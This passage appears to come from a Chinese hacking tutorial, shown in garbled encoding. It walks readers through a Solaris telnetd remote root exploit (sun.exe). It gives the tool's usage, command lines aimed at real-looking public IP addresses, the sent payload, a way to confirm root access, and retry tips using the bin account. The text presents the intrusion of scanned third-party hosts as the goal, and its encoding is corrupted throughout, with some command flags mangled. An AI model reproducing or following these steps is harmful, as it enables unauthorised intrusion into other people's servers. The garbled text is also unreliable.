等掃描結(jié)束以后,我們?cè)倏纯匆郧按蜷_(kāi)的天眼,怎么樣?找到了很多的Solaris主機(jī)了吧!(如果沒(méi)有發(fā)現(xiàn)Solaris主機(jī),那么在SCANNER.EXE另外換一個(gè)IP段試一試,應(yīng)該能找到一些的).
好了,主機(jī)已經(jīng)找到了,接下來(lái)就是利用這個(gè)漏洞入侵了 ,將下載的sunos-telnet.zip解壓后發(fā)現(xiàn)有兩個(gè)文件,sun.exe和CYGWIN1.DLL,由于sun.exe需要CYGWIN1.DLL動(dòng)態(tài)數(shù)據(jù)庫(kù)的支持,所以在使用的時(shí)候請(qǐng)把兩者放在同一目錄下.
還是讓我們來(lái)看看sun.exe的用法,開(kāi)一個(gè)CMD,進(jìn)入改文件的目錄,在CMD下輸入:
F:HACK>sun.exe
======================
Solaris 5.6 7 8 telnetd Remote exploit
Code by lion, Welcome to HUC website http://www.cnhonker.com
usage: sun [-u user] [-p port] <-h host>
-u: login username (default: bin), try “root”
-p: port to use (default: 23)
看懂了吧!假設(shè)我們找到一個(gè)IP為202.193.*.80的Solaris主機(jī),那么我們就輸入”
sun.exe ?Cu root ?Cp 23 ?Ch 202.193.*.80
我們也可以直接的輸入:
sun.exe ?Ch 202.193.*.80
這時(shí)就使用默認(rèn)的值,用戶名為bin,端口為23.
現(xiàn)在我們就拿一臺(tái)我們剛剛找到的Solaris主機(jī)來(lái)做測(cè)試了,由于攻擊的端口就是23,所以這個(gè)-p我們就不要輸入了,在CMD下輸入:
Microsoft Windows XP [版本 5.1.2600]
(C) 版權(quán)所有 1985-2001 Microsoft Corp. D:Documents and Settingslinyun>f:
F:>cd hack
F:HACK>sun.exe -u root -h 210.220.131.236
==========================
Solaris 5.6 7 8 telnetd Remote exploite
Code by lion.Welcome to HUC website http://www.cnhonker.com
send to target:
root c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c
c c c c c c c c c c c c c c c c c c c c c c c c c c
當(dāng)出現(xiàn)了#這個(gè)符號(hào)的時(shí)候,這就說(shuō)明了我們已經(jīng)取得了管理員的權(quán)限了。
我們可以看看自己是不是真的取得管理員的權(quán)限了,在CMD中輸入who am i就可以看見(jiàn)我們的IP地址了!
注意:如果在攻擊的時(shí)候出現(xiàn)connect: Connection refused;connect: Connection aborted; connect: Connection reset by peer這樣的信息,或者等了很久還沒(méi)有反應(yīng),則表示攻擊失敗了,最大的可能是這臺(tái)Slaris不允許root用戶遠(yuǎn)程登陸,我們可以用一般的系統(tǒng)用戶bin溢出試一試.